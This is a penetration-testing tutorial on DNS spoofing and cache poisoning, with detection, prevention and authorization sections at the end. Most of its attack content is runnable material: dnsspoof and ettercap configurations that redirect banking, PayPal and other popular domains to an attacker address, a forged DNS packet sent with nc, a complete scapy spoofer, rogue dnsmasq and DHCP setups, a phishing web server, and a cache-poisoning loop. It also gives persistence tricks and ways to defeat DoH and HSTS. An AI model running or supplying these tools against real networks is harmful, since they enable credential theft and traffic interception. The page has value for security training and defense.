DNS Spoofing
Understanding DNS Spoofing - Domain Name Resolution Manipulation
What is DNS Spoofing?
Simple Definition: DNS spoofing involves providing false DNS responses to redirect users from legitimate websites to attacker-controlled servers by manipulating domain name resolution, enabling phishing attacks and traffic interception.
Technical Definition: DNS spoofing exploits the absence of response authentication in classic DNS (plain UDP, no DNSSEC validation) to inject forged responses that map domain names to attacker-chosen IP addresses. Because a resolver trusts the first matching answer and then caches it, a single accepted forgery yields traffic redirection, credential harvesting, and content manipulation for every client of that resolver.
Why DNS Spoofing Works
DNS spoofing succeeds due to fundamental protocol design limitations:
- No Response Authentication: classic DNS has no cryptographic validation of responses; without DNSSEC, anything that looks like an answer is trusted
- First Matching Response Wins: a client or resolver accepts the first response whose transaction ID, destination port and question section match its pending query and ignores later ones, including the genuine reply
- Cache-Based Resolution: resolvers cache responses for the answer's TTL, so one accepted forgery is served to every client of that resolver until it expires
- UDP-Based Protocol: connectionless transport with no handshake means a forged response can be sent by anyone who can reach (or guess) the right port; the 16-bit transaction ID plus the source port are the only values an off-path attacker has to match
Attack Process Breakdown
Normal DNS Resolution
- DNS Query: Client sends domain name query to DNS resolver
- Recursive Resolution: DNS resolver queries authoritative servers for domain
- Authoritative Response: Legitimate DNS server provides correct IP address
- Cache Update: Resolver caches response and returns result to client
- Client Connection: Client connects to legitimate server using resolved IP
DNS Spoofing Process
- Traffic Monitoring: Monitor DNS queries from target systems
- Response Injection: Send false DNS responses before legitimate replies
- Cache Poisoning: Inject malicious entries into DNS resolver caches
- Traffic Redirection: Direct clients to attacker-controlled servers
- Attack Implementation: Execute phishing, credential harvesting, or content manipulation
Real-World Impact
Credential Harvesting: Redirect users to fake login pages for password theft
Phishing Enhancement: Direct victims to convincing replicas of legitimate websites
Traffic Interception: Route all communications through attacker-controlled infrastructure
Content Manipulation: Serve malicious content appearing to come from trusted sources
Business Disruption: Redirect customers away from legitimate business websites
Technical Concepts
DNS Protocol Fundamentals
- DNS Query Types: A (IPv4), AAAA (IPv6), MX (mail), CNAME (canonical name), NS (nameserver)
- Query Process: Recursive resolution through the DNS hierarchy
- Caching Mechanism: TTL-based response caching for performance
- Authority Structure: Authoritative vs recursive DNS servers
Spoofing Techniques
- Response Racing: Send false responses faster than the legitimate server
- Cache Poisoning: Inject malicious entries into DNS resolver caches
- Local DNS Override: Modify local DNS configuration or hosts files
- Rogue DNS Server: Deploy fake DNS servers on compromised networks
Attack Positioning Methods
- Network-Level Spoofing: Intercept and respond to DNS queries on the network
- MitM Integration: Combine with ARP spoofing for comprehensive positioning
- Rogue Access Point: Deploy fake wireless networks with malicious DNS
- DHCP Manipulation: Distribute malicious DNS server addresses via DHCP
Technical Implementation
Prerequisites
Network Requirements:
- Ability to intercept or respond to DNS queries
- Understanding of target DNS infrastructure
- Network positioning for DNS response injection
Essential Tools:
- dnsspoof (dsniff): Forges A and PTR answers for queries sniffed on an interface, driven by a hosts-style mapping file
- Ettercap: Integrated DNS spoofing (dns_spoof plugin) with ARP-based MitM positioning
- Bettercap: Modern network attack framework with ARP spoofing and a dns.spoof module
- Responder: LLMNR, NBT-NS, and mDNS poisoner; it hijacks the Windows fallback name-resolution protocols on the local segment rather than DNS itself
Essential Command Sequence
Step 1: DNS Infrastructure Analysis
# Identify target DNS configuration
nslookup example.com
# Shows current DNS resolution for target domain
# Identifies legitimate IP addresses
# Provides baseline for spoofing detection
# Discover DNS servers in use
cat /etc/resolv.conf
# Shows configured DNS servers
# On systemd-resolved hosts this lists only the local stub 127.0.0.53; use `resolvectl status` to see the real upstream servers
# Identifies targets for cache poisoning
# Reveals DNS infrastructure dependencies
# Test DNS response times
dig @8.8.8.8 example.com +stats
# Shows query time and response characteristics
# Identifies timing windows for response racing
# Reveals DNS performance baselines
Purpose: Understand target DNS infrastructure and resolution patterns to optimize spoofing effectiveness.
Step 2: Basic DNS Spoofing Setup
Using DNSSpoof for Simple Spoofing:
# Create DNS spoofing configuration (dnsspoof uses /etc/hosts order: IP first, then hostname)
echo "192.168.1.50 example.com" > dns_spoof.conf
echo "192.168.1.50 *.facebook.com" >> dns_spoof.conf
echo "192.168.1.50 *.google.com" >> dns_spoof.conf
# Maps domains to attacker-controlled IP
# Supports wildcard patterns for comprehensive coverage
# Redirects multiple popular sites to single server
# Start DNS spoofing
dnsspoof -i eth0 -f dns_spoof.conf
# -i eth0: Network interface for spoofing
# -f: Configuration file with domain mappings
# Sniffs queries on the interface and races a forged A answer back to the client
# Only works from a position where the victims' queries are visible (same segment plus
# ARP spoofing, or a rogue AP) and loses any race the real answer wins
Using Ettercap with Integrated MitM:
# Configure ettercap DNS spoofing targets
echo "*.bank.com A 192.168.1.50" >> /etc/ettercap/etter.dns
echo "*.paypal.com A 192.168.1.50" >> /etc/ettercap/etter.dns
echo "*.amazon.com A 192.168.1.50" >> /etc/ettercap/etter.dns
# Ettercap-specific DNS configuration format
# Targets high-value domains for credential harvesting
# Integrates with ARP spoofing for positioning
# Launch combined ARP spoofing and DNS spoofing
ettercap -T -M arp:remote /192.168.1.100// /192.168.1.1// -P dns_spoof
# -P dns_spoof: Enable DNS spoofing plugin
# Combines Layer 2 positioning with DNS manipulation
# Comprehensive traffic redirection capability
Step 3: DNS Cache Poisoning
# Monitor DNS queries for timing
tcpdump -i eth0 -n udp port 53
# Captures DNS traffic for analysis
# Shows query patterns, transaction IDs and the resolver's outbound source ports
# Identifies opportunities for response injection
# Trigger a cache miss so the resolver sends an upstream query
dig @192.168.1.1 example.com &
# Background process so the forged reply can be sent while the query is pending
# Wire format of a forged answer: TXID 0x1234, flags QR/RD/RA, example.com A 192.168.1.50, TTL 3600
printf '\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00\x07example\x03com\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\x00\x0e\x10\x00\x04\xc0\xa8\x01\x32' | \
nc -u 192.168.1.1 53
# Sending this to the resolver's listening port 53, as above, does not poison anything:
# the resolver parses a packet with the QR bit set as a malformed query and drops it
# A real poisoning attempt must reach the ephemeral source port the resolver used for its
# upstream query, carry the matching 16-bit TXID and the same question, and arrive before
# the authoritative answer. On-path, TXID and port are read from the sniffed query; off-path
# they must be guessed (Kaminsky-style: many queries for random subdomains, a flood of
# forged answers per query, and an in-bailiwick NS/glue record to take over the whole zone)
# Once accepted, the entry is served to every client of that resolver until the TTL expires
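The acceptance rule behind "first matching response wins", and why the on-path and off-path cases differ so much, as an added example that is not code from the original page. It builds the same wire-format answer as the hand-crafted packet above with plain `struct` (covering the message layout from the DNS Protocol Fundamentals section), models a resolver's pending-query table, and checks which forged replies it would actually cache. The function and class names (`build_answer`, `OutstandingQueries`, `race_demo`, `offpath_attempts`) and the addresses 203.0.113.10 (stand-in for the genuine answer) and 192.168.1.50 (the page's attacker box) are this example's own choices.

```python
#!/usr/bin/env python3
"""Model of the resolver-side matching rule (RFC 5452) that decides whether a forged
DNS answer is accepted. Added example; names and addresses are assumptions."""
import random
import struct


def encode_name(name):
    """'example.com' -> b'\\x07example\\x03com\\x00' (DNS label format)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(txid, qname):
    """Standard query: flags=RD, one A/IN question, no answers."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack(">HH", 1, 1)


def build_answer(txid, qname, ip, ttl=300):
    """Forged response: flags=QR|RD|RA, question echoed, one A record whose owner
    name is a compression pointer (0xC00C) back to the question name."""
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack(">HH", 1, 1)
    rdata = bytes(int(octet) for octet in ip.split("."))
    rr = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + rr


def parse_header(msg):
    """Return (txid, flags, qdcount, ancount)."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    return txid, flags, qd, an


def parse_question(msg):
    """Return (qname, qtype, qclass, offset of the first answer RR)."""
    i, labels = 12, []
    while msg[i] != 0:
        labels.append(msg[i + 1:i + 1 + msg[i]].decode("ascii"))
        i += 1 + msg[i]
    qtype, qclass = struct.unpack(">HH", msg[i + 1:i + 5])
    return ".".join(labels), qtype, qclass, i + 5


def parse_first_a(msg, off):
    """Read the first answer RR (pointer or full name); dotted IPv4 or None."""
    if msg[off] & 0xC0 == 0xC0:
        off += 2
    else:
        while msg[off] != 0:
            off += 1 + msg[off]
        off += 1
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
    if rtype != 1 or rdlen != 4:
        return None
    return ".".join(str(b) for b in msg[off + 10:off + 14])


class OutstandingQueries:
    """Minimal resolver: pending upstream queries keyed by (source port, txid), plus a cache."""

    def __init__(self):
        self.pending = {}
        self.cache = {}

    def send_query(self, qname, src_port=None):
        """Random 16-bit TXID and, unless pinned (old resolvers used 53), a random port."""
        txid = random.getrandbits(16)
        src_port = src_port or random.randint(1024, 65535)
        self.pending[(src_port, txid)] = qname
        return build_query(txid, qname), src_port

    def receive(self, dst_port, msg):
        """Accept iff QR is set and port + TXID + question match a pending query.
        The first match retires the query, so a later (genuine) answer is ignored."""
        txid, flags, qd, an = parse_header(msg)
        if not (flags & 0x8000) or qd != 1 or an < 1:
            return False
        qname, qtype, qclass, off = parse_question(msg)
        if (qtype, qclass) != (1, 1) or self.pending.get((dst_port, txid)) != qname:
            return False
        ip = parse_first_a(msg, off)
        if ip is None:
            return False
        del self.pending[(dst_port, txid)]
        self.cache[qname] = ip
        return True


def race_demo():
    """On-path attacker: TXID and port copied from the sniffed query, reply sent first."""
    r = OutstandingQueries()
    query, sport = r.send_query("example.com")
    txid = parse_header(query)[0]
    forged_ok = r.receive(sport, build_answer(txid, "example.com", "192.168.1.50"))
    genuine_ok = r.receive(sport, build_answer(txid, "example.com", "203.0.113.10"))
    return forged_ok, genuine_ok, r.cache["example.com"]


def offpath_attempts(qname, attempts, fixed_port=None, seed=1):
    """Off-path attacker guessing TXID (and the port, unless the resolver pins it)."""
    random.seed(seed)
    r = OutstandingQueries()
    r.send_query(qname, src_port=fixed_port)
    hits = 0
    for _ in range(attempts):
        port = fixed_port or random.randint(1024, 65535)
        hits += r.receive(port, build_answer(random.getrandbits(16), qname, "192.168.1.50"))
    return hits


if __name__ == "__main__":
    print("on-path race (forged accepted, genuine accepted, cached):", race_demo())
    print("off-path, port pinned to 53, 5000 guesses:", offpath_attempts("example.com", 5000, 53))
    print("off-path, random port, 5000 guesses:", offpath_attempts("example.com", 5000))
```

`race_demo()` returns `(True, False, "192.168.1.50")`: the forged packet is cached and the genuine one, arriving a moment later with the very same TXID and port, is dropped. The off-path loop shows the other side of the coin: with the port pinned, each guess has a 1 in 65536 chance; with port randomization it is roughly 1 in 4 billion, which is why modern poisoning needs the Kaminsky trick of forcing thousands of fresh queries rather than racing a single one.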
Step 4: Rogue DNS Server Deployment
Configure Local DNS Server:
# Install and configure dnsmasq as rogue DNS server
apt update && apt install dnsmasq
# Configure malicious DNS responses
cat > /etc/dnsmasq.conf << EOF
listen-address=192.168.1.50
# address=/domain/ matches the domain and every subdomain, so no wildcard syntax is needed
address=/facebook.com/192.168.1.50
address=/google.com/192.168.1.50
address=/amazon.com/192.168.1.50
address=/paypal.com/192.168.1.50
# Catch-all: any name not matched above also resolves to the attacker IP. This makes the
# per-domain lines redundant and breaks every other site, so omit it for a quieter attack
address=/#/192.168.1.50
EOF
# Start rogue DNS server
systemctl start dnsmasq
systemctl enable dnsmasq
# Starts malicious DNS service
# Responds to all queries with attacker IP
# Creates comprehensive traffic redirection
DHCP Integration for DNS Distribution:
# Configure DHCP to distribute malicious DNS servers
cat > /etc/dhcp/dhcpd.conf << EOF
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.100 192.168.1.200;
option routers 192.168.1.1;
option domain-name-servers 192.168.1.50; # Rogue DNS server
option domain-name "local";
}
EOF
# Start rogue DHCP server (set INTERFACESv4 in /etc/default/isc-dhcp-server first)
systemctl start isc-dhcp-server
# Distributes malicious DNS configuration
# Affects clients whose DHCP requests this server answers first; it competes with the
# legitimate DHCP server, so reliability depends on answering faster or exhausting its pool
# Persists for the lease lifetime; DHCP snooping on switches blocks offers from untrusted ports
Step 5: Advanced DNS Spoofing Techniques
Selective Domain Spoofing:
#!/usr/bin/env python3
"""Selective DNS spoofer: answer sniffed A queries for chosen domains with a forged record."""
from scapy.all import DNS, DNSQR, DNSRR, IP, UDP, send, sniff


class SelectiveDNSSpoof:
    def __init__(self, interface, target_domains, redirect_ip):
        self.interface = interface
        # Normalise to lower case without a trailing dot for matching
        self.target_domains = [d.lower().rstrip(".") for d in target_domains]
        self.redirect_ip = redirect_ip

    def is_target(self, query_name):
        """Match the domain itself or any subdomain. A plain substring test would
        also match unrelated names such as notgoogle.com."""
        return any(query_name == d or query_name.endswith("." + d)
                   for d in self.target_domains)

    def packet_handler(self, packet):
        """Forge an answer for every matching A query seen on the wire."""
        if not (packet.haslayer(IP) and packet.haslayer(UDP) and packet.haslayer(DNSQR)):
            return
        # Responses carry the question section too, so check the QR bit; otherwise the
        # handler answers replies, including its own forged ones, in a loop
        if packet[DNS].qr != 0 or packet[DNSQR].qtype != 1:  # only A queries
            return
        query_name = packet[DNSQR].qname.decode("utf-8").rstrip(".").lower()
        if not self.is_target(query_name):
            return
        # Swap addresses and ports and copy the transaction ID so the client accepts
        # the reply; it only wins if it arrives before the real resolver's answer
        spoofed_response = (
            IP(src=packet[IP].dst, dst=packet[IP].src) /
            UDP(sport=packet[UDP].dport, dport=packet[UDP].sport) /
            DNS(id=packet[DNS].id, qr=1, aa=1, rd=packet[DNS].rd, ra=1,
                qd=packet[DNS].qd,
                an=DNSRR(rrname=packet[DNSQR].qname, type="A", ttl=300,
                         rdata=self.redirect_ip))
        )
        send(spoofed_response, verbose=False)
        print(f"Spoofed DNS query for {query_name} -> {self.redirect_ip}")

    def start_spoofing(self):
        """Sniff DNS on the interface and hand each packet to the handler."""
        print(f"Starting selective DNS spoofing on {self.interface}")
        print(f"Target domains: {self.target_domains}")
        print(f"Redirect IP: {self.redirect_ip}")
        # Needs root and a position where the victims' queries are visible
        # (after ARP spoofing, or on a rogue access point)
        sniff(iface=self.interface, filter="udp port 53",
              prn=self.packet_handler, store=0)


if __name__ == "__main__":
    # Configure and start selective DNS spoofing
    target_domains = ["facebook.com", "google.com", "amazon.com", "paypal.com"]
    spoofer = SelectiveDNSSpoof("eth0", target_domains, "192.168.1.50")
    spoofer.start_spoofing()
Attack Variations
Protocol-Specific Spoofing
# Target IPv6 DNS queries (AAAA records)
dig AAAA example.com
# Test IPv6 DNS resolution
# Often overlooked in security configurations
# May provide alternate attack vector
# Spoof IPv6 DNS responses
# dsniff's dnsspoof forges only A and PTR answers and its hosts file has no record-type
# column, so a line such as "example.com AAAA 2001:db8::50" is not valid input for it.
# Use a tool that understands AAAA: ettercap's etter.dns accepts the record type, and the
# scapy spoofer in Step 5 can be extended with an AAAA DNSRR
echo "example.com AAAA 2001:db8::50" >> /etc/ettercap/etter.dns
# IPv6 DNS spoofing configuration
# Redirects IPv6 traffic to attacker
# Dual-stack hosts prefer IPv6 addresses (RFC 6724), so an unspoofed AAAA answer can
# defeat an A-only spoof; spoof both record types in dual-stack environments
Integration with Social Engineering
# Create convincing phishing infrastructure
# Set up web server on redirected IP
python3 -m http.server 80 --directory /var/www/phishing
# Serves convincing replicas of target sites over plain HTTP
# Captures credentials from DNS-redirected users
# Only works for sites the victim reaches over http://; an HTTPS or HSTS-preloaded site
# shows a certificate error or refuses to connect unless a CA the victim trusts is available
# Log DNS spoofing victims
tcpdump -i eth0 -n udp port 53 -w dns_victims.pcap
# Captures DNS queries for victim identification
# Shows effectiveness of spoofing campaign (compare queries against forged answers sent)
# Enables targeted follow-up attacks
Automated DNS Poisoning
#!/usr/bin/env bash
# Automated DNS cache poisoning script (the shebang has to be the first line)
TARGETS=("example.com" "test.org" "sample.net")
RESOLVER="192.168.1.1"
MALICIOUS_IP="192.168.1.50"
for domain in "${TARGETS[@]}"; do
# Send query to trigger a cache miss and an upstream lookup
dig @"$RESOLVER" "$domain" >/dev/null 2>&1 &
# Immediately send spoofed responses. dns_poison.py is a helper not shown on this page;
# to have any effect it must target the resolver's outbound source port with the matching
# TXID (guessed, when off-path), not the resolver's listening port 53
python3 dns_poison.py "$RESOLVER" "$domain" "$MALICIOUS_IP" &
echo "Poisoning attempt for $domain"
sleep 1
done
wait
echo "DNS cache poisoning campaign completed"
Common Issues and Solutions
Problem: Spoofed responses arrive after the legitimate ones and are ignored
- Solution: Reply from as close to the victim as possible (same segment, ARP-spoofed gateway), pre-build the response packets, or poison the shared resolver's cache so the race only has to be won once
Problem: DNS over HTTPS (DoH) bypassing spoofing attempts
- Solution: Block the DoH endpoints (ordinary TLS on TCP/443 to fixed resolver IPs) and return NXDOMAIN for Firefox's canary domain use-application-dns.net, which makes Firefox fall back to system DNS; target legacy clients; combine with application-layer attacks
Problem: The redirect works but HTTPS sites fail with certificate errors or HSTS refusals
- Solution: Target plain-HTTP services and hosts not on the HSTS preload list, use a CA the victim already trusts where the engagement allows installing one, or rely on social engineering around the warning
Problem: Poisoning the recursive resolver fails (source-port randomization, DNSSEC validation, 0x20 case randomization)
- Solution: Get on-path so TXID and port can be read instead of guessed, or bypass the resolver entirely with rogue DHCP/DNS infrastructure
Advanced Techniques
DNS Tunneling Detection
#!/usr/bin/env python3
"""Flag DNS queries whose names look like tunnel or exfiltration payloads."""
from scapy.all import DNS, DNSQR, sniff


def dns_tunnel_detector(packet):
    """Heuristics: very long names, many labels, or a single long label."""
    if not packet.haslayer(DNSQR) or packet[DNS].qr != 0:
        return
    query = packet[DNSQR].qname.decode("utf-8", "replace").rstrip(".")
    labels = query.split(".")
    longest = max(len(label) for label in labels)
    if len(query) > 50 or len(labels) > 5 or longest > 30:
        print(f"Potential DNS tunnel detected: {query} "
              f"(len={len(query)}, labels={len(labels)}, longest={longest})")
        # Tunnels carry data in the query name and in TXT/NULL answers; the follow-up
        # is decoding the specific tunnel protocol, which depends on the tool in use


# Monitor for DNS tunneling (sniffing requires root)
sniff(filter="udp port 53", prn=dns_tunnel_detector, store=0)
Multi-Vector DNS Attacks
# Combine DNS spoofing with multiple attack vectors
# 1. ARP spoofing for positioning and 2. DNS spoofing for redirection, in ONE ettercap
#    instance: a second ettercap on the same interface would fight the first for packets
ettercap -T -M arp:remote /192.168.1.100// /192.168.1.1// -P dns_spoof &
# 3. Transparent HTTP/HTTPS proxy for content manipulation
#    (needs ip_forward=1 and nat PREROUTING REDIRECT rules sending TCP 80/443 to 8080;
#    mitmproxy detects TLS on any redirected port, so one instance covers both)
mitmproxy --mode transparent --listen-port 8080 &
# 4. HTTPS: mitmproxy signs leaf certificates with its own CA, so victims see certificate
#    warnings unless that CA is installed on them, and HSTS or pinned apps fail closed
# Comprehensive attack integrating multiple techniques
# Maximum impact through coordinated attack vectors
Persistent DNS Redirection
# Modify system DNS configuration for persistence
echo "nameserver 192.168.1.50" > /etc/resolv.conf
chattr +i /etc/resolv.conf
# Makes DNS configuration immutable
# On systemd-resolved or NetworkManager hosts resolv.conf is a regenerated symlink and
# chattr fails on it; the server must then be set in that service's own configuration
# Ensures persistent redirection
# Requires root access on target system
# Alternative: Modify hosts file
echo "192.168.1.50 facebook.com" >> /etc/hosts
echo "192.168.1.50 google.com" >> /etc/hosts
echo "192.168.1.50 amazon.com" >> /etc/hosts
# Direct hostname resolution bypass
# Overrides DNS resolution entirely
# Persistent local redirection
Detection and Prevention
Detection Indicators
- Two responses for one query (same client port and transaction ID) carrying different answers, or responses arriving faster than the resolver could plausibly have produced them
- DNS responses from servers other than the configured resolvers
- Unusual DNS traffic patterns or volumes (e.g. floods of responses toward one resolver port, the signature of off-path TXID guessing)
- Certificate warnings for normally trusted sites
- Applications failing to connect to expected services, or public names resolving to private/LAN addresses
Prevention Measures
DNS Security Implementation:
- Deploy DNS Security Extensions (DNSSEC) so validating resolvers reject forged answers; DNSSEC protects the resolver's own lookups, not the unauthenticated last hop from client to resolver
- Use DNS over HTTPS (DoH) or DNS over TLS (DoT) between clients and resolvers so that last hop is authenticated and encrypted
- Implement DNS filtering and monitoring
- Use resolvers that randomize source ports and transaction IDs and validate DNSSEC (Quad9, Cloudflare, etc.)
Network Configuration:
# Configure secure DNS resolution
echo "nameserver 9.9.9.9" > /etc/resolv.conf # Quad9
echo "nameserver 1.1.1.1" >> /etc/resolv.conf # Cloudflare
# Use DNS providers with security filtering
# Plain UDP/53 to these providers is still spoofable by anyone on-path; use their DoT or DoH
# endpoints (e.g. DNSOverTLS=yes in systemd-resolved) so responses are authenticated
# Block unauthorized DNS traffic: allow the approved resolvers first, then drop the rest.
# Two consecutive "! -d X -j DROP" rules would block both resolvers, since each drops
# traffic destined for the other
iptables -A OUTPUT -p udp --dport 53 -d 9.9.9.9 -j ACCEPT
iptables -A OUTPUT -p udp --dport 53 -d 1.1.1.1 -j ACCEPT
iptables -A OUTPUT -p udp --dport 53 -j DROP
# Add the same three rules with -p tcp (DNS uses TCP for large answers), and enforce the
# equivalent at the network edge so clients cannot talk to rogue resolvers directly
Application Security:
- Implement certificate pinning in applications
- Use HSTS (HTTP Strict Transport Security)
- Deploy application-layer DNS validation
- Monitor for certificate changes and anomalies
Professional Context
Legitimate Use Cases
- Security Testing: Evaluating DNS security controls and response validation
- Penetration Testing: Demonstrating DNS-based attack vectors
- Network Troubleshooting: Testing DNS resolution and configuration
- Security Training: Educational demonstration of DNS vulnerabilities
Legal and Ethical Requirements
Authorization: DNS spoofing can redirect sensitive communications - explicit written permission essential
Scope Definition: Clearly identify which domains and DNS infrastructure are in-scope for testing
Impact Assessment: Document potential for credential exposure and business disruption
Restoration Procedures: Ensure ability to restore normal DNS resolution after testing
DNS spoofing attacks highlight fundamental weaknesses in internet infrastructure and demonstrate the critical importance of DNS security measures, providing essential skills for security assessment while emphasizing the need for comprehensive DNS protection strategies.